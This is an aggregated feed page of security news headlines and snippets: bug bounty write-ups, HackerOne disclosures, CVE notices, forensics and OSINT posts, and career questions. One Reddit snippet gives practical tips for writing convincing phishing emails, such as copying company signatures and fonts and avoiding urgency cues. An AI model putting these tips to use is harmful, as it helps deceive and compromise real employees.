    Passed my GSEC!
    Passed my GSEC with an 84 today, not as high as I was hoping but comfortably in the middle. Overall I am happy with the experience! My job gets vouchers for SANS every year so which course should I pursue next if I can get a voucher? For context I work Cyber Threat Analysis and Passive/Active Network Analysis. Currently have GNFA as my only other cert. submitted by /u/Johnsonwilliam977 [link] [comments]
  • Open

    UNC3524: Eye Spy on Your Email
    submitted by /u/mattjayy [link] [comments]
    How masscan works
    submitted by /u/rushter_ [link] [comments]
    Augury Augury: Using Data Memory-Dependent Prefetchers to Leak Data at Rest (on Apple M1 and similar)
    submitted by /u/nicuramar [link] [comments]
    AWS Targeted by a Package Backfill Attack
    submitted by /u/viagas472 [link] [comments]
  • Open

    He110 W0r1d
    My dear digital natives, developer, hackers and programmers… It’s nice to meet everyone of you! Continue reading on Medium »
    War in Ukraine / May 1
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    NahamCon Capture The Flag 2022 [Versi Indonesia]
    Perlu diketahui bahwa Write Up ini hanya berfokus pada challenge yang berkategori Open Source Intelligence (OSINT) pada NahamCon CTF 2022 Continue reading on Medium »
    Making an untraceable smartphone…
    Let’s talk about… anonymity. Today we will talk about the security of our mobile phones. Let’s start with hadware… Continue reading on Medium »
  • Open

    North Korean books and pictures, my guess is that it's run by some Jucheist in the west trying to share around DPRK propaganda, interesting to look through and might be helpful if you're curious about reading books from NK and don't know where to look
    submitted by /u/subwaytech [link] [comments]
    Some Games
    http://ashamanecore.com/dicpics/Games/ submitted by /u/Madman3001 [link] [comments]
    A Google drive folder with movies, books, audiobooks and shows
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/EpikDuckiee [link] [comments]
    a bunch of files about military boats (mostly pictures)
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki周刊(第426期) by ourren Python Cookbook 第三版 中文版 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki周刊(第426期) by ourren Python Cookbook 第三版 中文版 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reflected XSS Vulnerability leads to Credential Stealing worth $100
    Hi! This is Rian with my very first bug bounty write-up. Continue reading on Medium »
    An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
    How to find, exploit, and prevent insecure direct object references Continue reading on Medium »
  • Open

    Breakout from the Seccomp Unconfined Container
    submitted by /u/tbhaxor [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced... The post g_CiOptions in a Virtualized World appeared first on TrustedSec.
  • Open

    BPF 进阶笔记(四):调试 BPF 程序
    本文是阅读一些 BPF 高级教程时所作的笔记。 关于 “BPF 进阶笔记” 系列 平时学习和使用 BPF 时所整理。由于是笔记而非教程,因此内容不会追求连贯,有基础的 同学可作查漏补缺之用。 文中涉及的代码,如无特殊说明,均基于内核 5.10 版本。 BPF 进阶笔记(一):BPF 程序(BPF Prog)类型详解:使用场景、函数签名、执行位置及程序示例 BPF 进阶笔记(二):BPF Map 类型详解:使用场景、程序示例 BPF 进阶笔记(三):BPF Map 内核实现 BPF 进阶笔记(四):调试 BPF 程序 关于 “BPF 进阶笔记” 系列 1 打印日志 1.1 日志路径及格式 1.2 bpf_printk():kernel 5.2+ 使用方式 使用限制 内核实现 1.3 bpf_trace_printk() 使用方式 使用限制 内核实现 2 用 BPF 程序 trace 另一个 BPF 程序(BPF trampoline) 2.1 使用场景 2.2 依赖:kernel 5.5+ 3 设置断点,单步调试 3.1 bpf_dbg(仅限 cBPF) 1 打印日志 1.1 日志路径及格式 本节将介绍的几种打印日志方式最终都会输出到 debugfs 路径 /sys/kernel/debug/tracing/trace: $ sudo tail /sys/kernel/debug/tracing/trace # 字段说明 - telnet-470 [001] .N.. 419421.045894: 0x000…

  • Open

    (XSS) Account takeover using Steam
    This story begins a couple of years ago. I was navigating through a gambling website (which I cannot disclose) when I decided I would… Continue reading on Medium »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on System Weakness »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on Medium »
    AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Part 2
    Hello Cybersecurity folk, I hope that you liked the previous article, so here you’ll learn about basic things about SQLi, Today’s article… Continue reading on Medium »
    Active VS Passive Reconnaissance
    Just like many other cybersecurity terms, “Reconnaissance” also derives from the military jargon. Continue reading on Bug Zero »
  • Open

    普京签署总统令:立即成立IT安全部门,禁用不友好国家信息安全设备
    现任俄罗斯总统普京正式签署了一份确保俄罗斯信息安全额外措施的总统令,下令俄罗斯所有部门、机构和骨干组织都需要设立IT安全部门。
  • Open

    XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244722
    XSS at videostore.mtnonline.com/GL/*.aspx via all parameters
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244731
    Enumerate class codes via yahoo dork - Can access any course under teacher - Sensitive information leaked
    Khan Academy disclosed a bug submitted by bughunterpol: https://hackerone.com/reports/1514356
  • Open

    Feedback Welcome
    Phishing Tips Avoid the classics Urgent Problem to fix (unpaid invoice, hotel bill, acct. compromise). Making the request too important or urgent raises suspicion and decreases the odds of user compliance since these tactics are hammered in modern Security Awareness training (yes, people will still click, but not as many). Embrace Subtlety and Play Hard to Get Signature format, company fonts, colors, match everything up to build trust levels E-mail HR or someone else from company with a normal question, wait for their reply, then collect above items Emotions without Urgency Normalcy and trust must be intertwined with the emotion you choose to target (RARELY make specific requests in the message body, remember that if they're interested they're going to cli…
    Linux Privilege Escalation (Series)
    submitted by /u/tbhaxor [link] [comments]
  • Open

    War in Ukraine / April 30
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Online Tools For OSINT
    A collection of several hundred online tools for OSINT Continue reading on Medium »
    MAC-address OSINT
    I propose to study the sources intended for the study of the MAC address. MAC or Media Access Control is a unique combination of numbers… Continue reading on Medium »
    SPY NEWS: Week 17
    Summary of the espionage-related news stories for the Week 17 (24–30 April) of 2022. Continue reading on Medium »
  • Open

    Is it wrong for GitHub to host hacking tools?
    The culture of most mainstream cyber sec forums / portals is "do no harm". Most forum members will thankfully not co-operate if they suspect their advice will be used for nefarious purposes. However, this culture of keeping things clean is slightly subverted by GitHub who seem to have some very potent hacking tools on their site. Yet, I rarely hear the media or other internet commentators lambast them in the same way that Walmart gets criticised for selling arms. Any thoughts on this? submitted by /u/astillero [link] [comments]
  • Open

    SecWiki News 2022-05-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #33] Add PP/IDOR/Type Juggling and SAML Injection 🪁
    Cullinan 로그 #33입니다. Prototype Pollution, IDOR, Type Juggling 그리고 SAML Injection 항목을 새로 추가했습니다. 그리고 SSRF에 SSRF Chains 관련 부분 추가했습니다. New Prototype Pollution IDOR Type Juggling SAML Injection Update Blind SSRF Canaries in SSRF 여담으로 Prototype Pollution은 정리하고 글을 올리고 얼마 안되서 Intigriti XSS Challenge 0422에 나와서 핵심 주제로 Prototype Pollution이 나와서 삽질을 덜 했던 기억이 있네요! 정말 타이밍이 좋았습니다 :D
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Ethical Hacking and other stuff
    I found this open directory. It contains tons of books and material related to ethical hacking. I am not sure about the quality of content, would like someone experienced in this field to comment on it. Tagging as NSFW as I haven't gone through all dirs. https://lira.epac.to/DOCS-TECH/Hacking/ submitted by /u/grvsood [link] [comments]
  • Open

    Rails – XSS Vulnerability in Action View
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-27777-possible-xss-vulnerability-in-action-view-tag-helpers/80534 Comments URL: https://news.ycombinator.com/item?id=31224906 Points: 1 # Comments: 1
    Reflected XSS Vulnerability Found in WordPress Anti-Malware Firewall
    Article URL: https://www.searchenginejournal.com/vulnerability-found-in-wordpress-anti-malware-firewall/448101/ Comments URL: https://news.ycombinator.com/item?id=31223394 Points: 1 # Comments: 0
  • Open

    iPhone Password cracking possible with ??
    Hi community … heard about Grayshift tool for conducting iOS forensics investigation …. Wanted to know how’s that tool able to crack the passcode or on the latest versions of iOS like 15.3 … how’s it able to recover most of data by breaking the code Any insights on this or on iOS forensics on latest versions would help .. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Changes In The Use Of LNK Files
    Not long ago, I posted regarding how LNK files can be (ab)used; the post refers to LNK file metadata, and how, if the LNK file is sent by the threat actor, that metadata can be used to learn about the threat actor's environment. I first saw this mentioned by JPCERT in 2016, where they included an interesting graph (figure 1) in their post to illustrate the point. Tony Lambert recently shared via his blog a change in Emotet TTPs, that the threat actor group had moved to using LNK files as an initial delivery mechanism. In the post, Tony described this as "a really interesting TTP change", and that it was "odd but not unexpected". Tony also shared a link to download a copy of the LNK file, as well as metadata parsed from the LNK sample via EXIFTool. I don't often use EXIFTool for this sort …
  • Open

    As an ethical hacker, network scanning techniques, also known as path tracing, can assist you in learning about a network’s logical configuration.
    submitted by /u/RaccoonCivil5453 [link] [comments]
    Analysis of phishing kill chain identifies emerging technique that exploits trust in your collaboration platforms
    submitted by /u/boybeaid [link] [comments]

  • Open

    Best OS for exploit development against Windows
    What is the best OS to develop windows exploits? Currently using Kali with VMware workstation. What does everyone else use? submitted by /u/FutureMasterRoshi [link] [comments]
  • Open

    wired or looks like malicious behaviors but are actually normal
    What are the wired system or network behaviors that you think they are wired and should be alerted but actually, are very common? Let me get started. ​ Splunk and Nessus both love using long B64 Powershell encoded commands to do stuff. Lots of legit stuff running Whoami as System submitted by /u/Calm_Scene [link] [comments]
    What tech should I be learning?
    I’ve been in IT for over 10 years. Jack of all trains master of none. I’ve got experience with Linux, Windows, network engineering, and security. Several SANS certs. Vendor certs expired years ago. Trying to move more towards security. Currently learning more about SIEM and detection with Wazuh. One thing I’m lacking is any programming or even scripting skills. About to learn Python. Powershell is also on the list. Other security interests include the following. 1. Compliance 2. Prevention 3. Detection Any technologies I should be looking into? Any topics I should read up on? Thanks! submitted by /u/damienhull [link] [comments]
  • Open

    War in Ukraine / April 29
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Maltego for the poor or what are the free add-ons for it
    A long time ago I decided to write an article about making work with Maltego cheaper. The product is definitely great. But very expensive… Continue reading on Medium »
    Services for detecting deepfakes
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-30 Review
    回顾 2021 年在野利用的 0day 漏洞 by ourren Smarty 模板注入与沙箱逃逸 by ourren 有趣的MISC by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-30 Review
    回顾 2021 年在野利用的 0day 漏洞 by ourren Smarty 模板注入与沙箱逃逸 by ourren 有趣的MISC by ourren 更多最新文章,请访问SecWiki
  • Open

    SAML Injection
    🔍 Introduction SAML Injection은 Security Assertion Markup Language (SAML) 에서 발생할 수 있는 Injection 공격을 의미합니다. SAML Process에서 XML 구문 내 공격코드를 통해 SSO 등 인증 과정을 우회하거나 Signature 검증을 통과할 수 있습니다. 🗡 Offensive techniques Detect SAML을 이용한 SSO 등 SAML 사용 구간은 모두 점검의 대상이됩니다. 기본적으로 Signature 검증에 대한 체크를 진행하며, XSW(XML Signature Wrapping) Attack 등으로 SAML Response/Assertion 메시지에 값을 추가하거나 변조하여 서버의 반응을 보고 체크할 수 있습니다.
    Type Juggling (Loose Comparison Bug)
    🔍 Introduction Type Juggling은 복수의 변수를 비교할 때 사용되는 Loose/Strict Comparison에 따라 개발자가 의도하지 않은 값으로 if 문 등을 통과할 수 있는 취약점을 의미합니다. 일반적으로 PHP가 영향을 받는 것으로 알려져 있습니다. 보통 PHP type juggling 또는 Magic hashes attack으로 많이 알려져 있습니다. Comparison Equal Not Equal Description Loose == != the same value Strict === !== the same type and the same value 🗡 Offensive techniques Detect PHP 코드상에서 == 또는 !
    IDOR (Insecure Direct Object Reference)
    🔍 Introduction IDOR(Insecure Direct Object References)는 Access Control에서 발생하는 취약점 중 외부에 노출되거나 제공되는 입력이 Object에 직접 참고하고 엑세스할 때 이를 이용하여 본인의 권한을 넘어서는 액션을 수행할 수 있습니다. Origin Request 1 GET /info?accountId=15442 IDOR Request 1 GET /info?accountId=1110 일반적으론 Horizontal privilege escalation 즉, 수평적으로 권한을 악용할 수 있지만 때때로 어플리케이션 구성이나 정책에 따라서 Vertical privilege escalation(수직적 권한 상승)으로 연결될 수 있습니다. 🗡 Offensive techniques Detect 어플리케이션 처리 로직에서 사용자 입력 값이 Object에 직접 참조되는 부분들이 모두 영향 받습니다.
  • Open

    Sensitive Data Exfiltration through XSS ($450)
    The story of my first bounty… Continue reading on Medium »
    Page Admin Disclosure when Posting a Reel
    Hello , I’m Syd from the Philippines. Today I would like to share one of my findings in Meta Bug Bounty Program. The bug that I found is… Continue reading on Medium »
    Bypassing File Upload Restriction using Magic Bytes
    Hello Hunters & Ninjas, Article is very late, for that accept my apology. Today I’m going to write about one of my finding in which an… Continue reading on Medium »
    Burp Suite Extension for AWS Signing
    AWSSigner Continue reading on Medium »
    ATO without any interaction [aws cognito misconfiguration]
    Hello friends, Continue reading on Medium »
  • Open

    com.nextcloud.client bypass the protection lock in andoid app v 3.18.1 latest version.
    Nextcloud disclosed a bug submitted by dashingjaved: https://hackerone.com/reports/1450368 - Bounty: $200
  • Open

    RW-Fuzzer: A Fuzzing Method for Vulnerability Mining on Router Web Interface
    submitted by /u/paran0ide [link] [comments]
  • Open

    Music/Games (pretty slow)
    https://www.7xr.nl submitted by /u/whopops [link] [comments]
  • Open

    HELP !! with Volatility
    Every time I run a command using volatility I get the following output: ​ Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... No suitable address space mapping found Tried to open image as: MachOAddressSpace: mac: need base LimeAddressSpace: lime: need base WindowsHiberFileSpace32: No base Address Space WindowsCrashDumpSpace64BitMap: No base Address Space WindowsCrashDumpSpace64: No base Address Space HPAKAddressSpace: No base Address Space VirtualBoxCoreDumpElf64: No base Address Space VMWareMetaAddressSpace: No base Address Space QemuCoreDumpElf: No base Address Space VMWareAddressSpace: No base Address Space WindowsCrashDumpSpace32: No base Address Space Win10AMD64PagedMemory: No base Address Space WindowsAMD64PagedMemory: No base Address Space LinuxAMD64PagedMemory: No base Address Space AMD64PagedMemory: No base Address Space IA32PagedMemoryPae: No base Address Space IA32PagedMemory: No base Address Space OSXPmemELF: No base Address Space FileAddressSpace: Location is not of file scheme ArmAddressSpace: No base Address Space ​ Any help is more than welcome. Thank you!! submitted by /u/maxoberto [link] [comments]

  • Open

    Root Cause Analysis
    One of the challenges within DFIR, particularly as we've moved to an enterprise approach by leveraging EDR telemetry, is the root cause analysis, or "RCA". In short, the challenge is observing malicious activity and determining the root cause; the challenge itself stems from the fact that EDR telemetry is only partial visibility, or that correlating observed malicious activity with causal data not evident or available via EDR telemetry requires additional context, and by extension, additional effort/expenditure of resources. It also requires an additional "leveling up" of skillsets.  Yes, many organizations that deploy EDR tooling also include a means for extracting additional files/data from the endpoint, and what to collect isn't usually in question. Rather, how to truly exploit the coll…
  • Open

    Lots of different stuff, including north korean electronic music
    submitted by /u/omnifage [link] [comments]
    Collection of PDF books about HTML, CSS, JavaScript, Python and others
    http://198.74.52.119/ submitted by /u/senpie95 [link] [comments]
  • Open

    Bug Bounty Operating Principles
    Experiences from a number of programs, and trying to be fair, generous, and grateful to security researchers. Continue reading on Medium »
    How was I able to find my first bug in a real website?
    It was the days of August 2020 when I used to try to find XSS (Cross-Site Scripting) vulnerability because of the curiosity that I… Continue reading on Medium »
    OTP Bypass + PATO = 100 Dollars Bounty
    Hello ppl! This is Gnana Aravind here with another awesome write-up explaining the story of my recent bounty. Continue reading on Medium »
    New Vault in Hats.Finance
    We are excited to onboard Temple DAO to the Hats bug bounty program! They have decided to open their bug bounty vault with 450,000 $TEMPLE… Continue reading on Medium »
    Introduction to Smart Contract why it is so demanding in the IT world…
    Started my research a month ago into Smart Contracts as a Security Analyst of Avalance Global Solutions and that’s why I want to share my… Continue reading on Medium »
  • Open

    Hackthebox: Infiltration
    Lab: OSINT Continue reading on Medium »
    War in Ukraine / April 28
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Social pages monitoring
    I propose to discuss today such an issue as the organization of monitoring the social pages of employees. Otherwise, there is a great risk… Continue reading on Medium »
    Media monitoring in OSINT
    Today we will talk about monitoring mentions in the media using free sources: Continue reading on Medium »
    OSINT: It’s just Googling
    Olympic sprinting: It’s just moving your legs dead fast. Continue reading on Medium »
  • Open

    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    MacOS Forensics/ SANS FOR518
    Hey y'all, TLDR; I'm new to MacOS Forensics and need to purchase a mac for the SANS FOR518, but confused around the hardware requirements. Is virtualisation on a mac essential if I already have a Windows workstation? Could I get through the course/ real world forensics with a M1 mac? I'm looking at enrolling the SANS FOR518 Mac Forensics online and it states that an Intel Mac is required. 1) Is an Intel Mac a critical requirement in the real world forensics, or will a M1 mac be a better investment in the long term (performance, futureproofing)? I have a Windows machine to run Windows/ Linux VMs. 2) What virtualisation is required during the FOR518 course? Is it to run Windows/ Linux tools or to virtualising a suspect image? 3) Macbook Air or Macbook Pro? Does the Macbook pro offer any significant benefits over the Macbook Air for the forensic use case? I'm looking at the base 8GB model - maybe 16GB if I absolutely need it. Appreciate any advice! submitted by /u/hiddenbytes [link] [comments]
    DoD Contracting Digital Forensics
    Greetings, Anyone have any experience doing digital forensics contracting for the DoD? A recruiter from Akima reached out to me for a contracted position for a federal agency doing exactly what I do now (digital forensics for law enforcement). The pay is nearly double and nets me a Top Security clearance (I previously held Public Trust). I would be crazy not to make the jump, right? submitted by /u/BlockchainForensics [link] [comments]
    Current free training?
    I know there was some posts about this a while ago, but nothing current. Anyone know of any free trainings related to computer/phone forensics? submitted by /u/foxcop91 [link] [comments]
  • Open

    Reflected XSS due to vulnerable version of sockjs
    Automattic disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1100326 - Bounty: $250
    Hardcoded AWS credentials in .msi
    8x8 disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1368690
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309385
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309237
    lfi in filePathDownload parameter via
    U.S. Dept Of Defense disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1542734
    Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint on
    U.S. Dept Of Defense disclosed a bug submitted by njmulsqb: https://hackerone.com/reports/1278977
    SSRF due to CVE-2021-27905 in www.
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1183472
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537543
    Blind SQL Injection
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/771215
    SQL INJECTION in https:///
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/723044
    Possibility to force an admin to install recommended applications
    Nextcloud disclosed a bug submitted by igorpyan: https://hackerone.com/reports/1403614 - Bounty: $100
    OAUTH2 bearer not-checked for connection re-use
    Internet Bug Bounty disclosed a bug submitted by monnerat: https://hackerone.com/reports/1552110 - Bounty: $2400
    CVE-2022-22576: OAUTH2 bearer bypass in connection re-use
    curl disclosed a bug submitted by monnerat: https://hackerone.com/reports/1526328
    DoS via large console messages
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1243724 - Bounty: $150
    CVE-2022-27776: Auth/cookie leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551591 - Bounty: $480
    CVE-2022-27775: Bad local IPv6 connection reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551588 - Bounty: $480
    CVE-2022-27774: Credential leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551586 - Bounty: $2400
  • Open

    SecWiki News 2022-04-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Introducting MutableSecurity: Seamlessly deployment and management of security solutions
    submitted by /u/iosifache [link] [comments]
    Be aware of this trick: Python module hijacking leading to code execution
    submitted by /u/slashtmp00 [link] [comments]
  • Open

    Best Nessus parser that works with v10 for free/cheap?
    We currently use Nessus Pro for vulnerability scanning. However the output reports it generates are not very helpful, often there can be 10 or 20 lines in the output CSV that refers to the same vulnerability on the same computer, whereas what we need is an actual actionable report that says these PCs have this vulnerability which you fix with this patch, or something similar. I found this article https://www.sans.org/blog/data-data-everywhere-what-to-do-with-volumes-of-nessus-output/ however it is from 2014 and the parser it links to is from 2017 and seems to require a Linux installation with Perl, we are a Windows organisation. Is there an up to date piece of software which does this kind of thing either free or low cost and runs on Windows? We can't afford Tenable.io for our entire workstation estate, this is why we have Nessus instead. submitted by /u/danj2k [link] [comments]
    Are soc roles notoriously slow?
    Got my first tier 1 soc role for a small company (2k employees) My training was watch vpshere and contact virtualization admin if anything goes over 90% usage for more than 10 mins. watch logrythm. The baseline is 5k logs. Report if it goes over for an extended period of time. answer SolarWinds alarms. Report if it's not a false positive.   That's it. That's what I do all day every day for 63k a year. How does this translate into a higher role? "Yeah I'm good at staring at a dashboard all day" Why can't they just tack this on as an additional responsibility to help desk or the sys admin? I dread the day the Company realizes they're wasting 60k * 6 employees to operate a 24/7 soc when all we do is watch Netflix all day and then they lay us off and I didn't even get any transferable skills to help get me a replacement job. Regarding certs, I've received a lot of bad feedback on certs. No job interview has ever even asked about my certs. People always flame and say "why would I hire a cert chaser?" Because I have a bunch already. All comptia which I know doesn't compare to something like cissp but certs have just left a bad taste in my mouth. I have A+ net+ sec+ cysa+ pentest+ and az900. submitted by /u/guywithaquestchin [link] [comments]
    Shodan vs Criminal ip
    I mentioned a search engine and a product called Criminalip a while ago! I think the page is open now, and I'm using one feature or another. I saw a post posted by a developer on the OSINT channel about criminalip, but I'm still a beginner, so I don't understand what you mean. But what I can see exactly is that it looks quite similar to Shodan. Which do you think is more valuable in terms of studying security compared to shodan and criminalip? Below is the link to the post of the developer and the related post I posted a while ago. ​ ​ https://www.reddit.com/r/OSINT/comments/ucyo2c/we_made_a_new_osint_tool_criminalipio_i_would/ ​ https://www.reddit.com/r/netsecstudents/comments/uct4pn/search_engine_preregistration_criminal_ip/ submitted by /u/Alexiosplana [link] [comments]
    Security Architecture study recommendations
    Hi, I am hoping to get some advice on which particular study/certification would be best suited to improving and consolidating my current experience. First a bit of background. I’ve been working in IT since 2004 and moved into network security in 2007. I’ve always worked for service providers who provided network security consultancy and expertise so I have about 15 years experience mostly in implementation of firewalls, web proxies, load balancers, IPS, AAA, VPN, some virtualisation, that kind of stuff. I’ve worked in some of the largest and most well known companies providing mostly deployment capabilities in these types of technologies for customers mostly in banking and telco industries. I would say about 85% deployment and 15% design. A large portion of the deployment work however w…
  • Open

    Trello From the Other Side: Tracking APT29 Phishing Campaigns
    submitted by /u/dmchell [link] [comments]
    Cybersecurity conferences
    Hi guys! Does anybody know what are the most interesting hacking and cybersecurity conferences in Europe? submitted by /u/Derrick_Wallarm [link] [comments]
  • Open

    Red Teaming Toolkit
    This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information… Continue reading on Medium »
  • Open

    Flask之session伪造
    前言本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过
    法国一医疗软件公司因泄露49万患者数据被罚150万欧元
    近日,法国监管机构国家信息与自由委员会(CNIL)对医疗软件供应商迪达勒斯生物公司(Dedalus Biology)处以150万欧元的罚款。
    法国一医疗软件公司因泄露49万患者数据被罚150万欧元
    近日,法国监管机构国家信息与自由委员会(CNIL)对医疗软件供应商迪达勒斯生物公司(Dedalus Biology)处以150万欧元的罚款。
    移动发送奇怪短信?我想起了通讯行业的核弹级漏洞
    有意思的是,这个漏洞虽然存在已久,但是却一直在被攻击者利用。今天咱们就再聊聊这个神奇的SS7漏洞。
    NSA网络基础设施安全指南(翻译)(三)
    本报告介绍了总体网络安全防护和网络设备保护的最佳实践,从而可以帮助管理员防止对手利用其网络进行攻击。这份指南提供的指导是通用,可以用于多种类型的网络设备。
    漏洞分析篇:栈溢出(CVE-2006-3439)漏洞分析
    漏洞是微软06年爆出的Server服务器栈溢出导致的远程代码执行漏洞。
    从0到1之安全运营如何做好监控?| FreeBuf甲方社群直播回顾
    网络安全运营即如何发现不足、分析成因、如何解决及避免事件再度发生。
    FreeBuf甲方群话题讨论 | 聊聊企业攻防实战演练
    如今的攻防实战演练应该常态化进行,对安全进行“摸底”?疫情条件下的远程办公会对攻防实战演练带来哪些变化或影响?
    攻击者劫持大量WordPress网站,对乌克兰进行DDoS攻击
    攻击者正在对亲乌克兰网站和政府门户网站进行 DDoS(分布式拒绝服务)攻击。
    FreeBuf周报 | 北京健康宝遭境外网络攻击;可口可乐证实受到网络攻击并开展调查
    Gartner称,安全和风险管理领导者需要应对七大趋势,才能使企业不断扩张的数字足迹免受新威胁。
    议题前瞻丨关于零信任架构在金融企业中应用的思路探讨
    跟随大佬,以“零信任的实际需求”为切入口,从理念到实践,提升每一个安全从业者对零信任架构的认知。
    微软修复了暴露用户数据库的ExtraReplica Azure漏洞
    这些漏洞可能让恶意用户在绕过身份验证后提升权限并获得对其他客户数据库的访问权限.
    研究发现,支付赎金只占勒索攻击事件总损失的 15%
    受害者由勒索导致的事件响应工作、系统恢复、法律费用、监控成本以及业务中断的整体影响所带来的财务支出比例远超赎金金额。
    官方通告,北京健康宝遭境外网络攻击
    4月28日,北京健康宝使用高峰期遭受网络攻击,经初步分析,网络攻击源头来自境外。
    Spring框架-CVE-2022-22965分解分析
    关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解。
  • Open

    ExtraReplica – a cross-account database vulnerability in Azure PostgreSQL
    Article URL: https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Comments URL: https://news.ycombinator.com/item?id=31203059 Points: 1 # Comments: 0
    Passing Time Syncing Secrets:Demonstrating Covert Channel Vulnerability in PTP
    Article URL: https://media-exp1.licdn.com/dms/document/C562DAQHsEBEOv6vilA/profile-treasury-document-pdf-analyzed/0/1650330515418?e=2147483647&v=beta&t=LKNnvu80n_mLo7USD2tudioeaERrXwGXqYIwNSODO64 Comments URL: https://news.ycombinator.com/item?id=31201656 Points: 1 # Comments: 1
  • Open

    Hacked Website Threat Report 2021
    Our 2021 Website Threat Research Report details our findings and analysis of emerging and ongoing trends and threats in the website security landscape. We’ve put together this analysis to help keep website owners informed and aware of the dangers posed by malicious actors. This year’s report is a collection of observations made by Sucuri’s Research and Remediation teams from data collected on web-based malware, vulnerable software, and attacks during 2021. The data used in this report is a representative sample of the total number of websites that our Remediation team performed services for throughout the year 2021, as well as more than 132 million SiteCheck scans. Continue reading Hacked Website Threat Report 2021 at Sucuri Blog.

  • Open

    Steganography for E01 files??
    I have an E01 file that I know has some data inside, but I cant find any software that can extract from an E01 file. It's 2.6GB so I don't really want to do it manually. Do you guys have any suggestions? submitted by /u/KTthemajicgoat [link] [comments]
    Android TV examination
    Hello, has anyone had any experience of examining a device (television) running the Android TV OS or similar? I'm not aware of any digital forensics software (Cellebrite etc) that you could use for such a task so presumably the only option is a manual examination. There seems to be very little information or discussion around this so any thoughts would be appreciated. submitted by /u/dwaynehicks2179 [link] [comments]
  • Open

    Socket: New tool takes a proactive approach to prevent OSS supply chain attacks
    submitted by /u/feross [link] [comments]
    LAPSUS$: Recent techniques, tactics and procedures
    submitted by /u/digicat [link] [comments]
    Kubernetes Goat - Interactive Kubernetes Security Learning Playground 🚀
    submitted by /u/madhuakula [link] [comments]
    reposaur - use Rego to audit your GitHub org security posture
    submitted by /u/fproulx [link] [comments]
    Colibri Loader's Unique Persistence Technique Using Get-Variable Cmdlet
    submitted by /u/sciencestudent99 [link] [comments]
    Anatomy of a Zero Day - How to decrypt....a robot?
    submitted by /u/312sec [link] [comments]
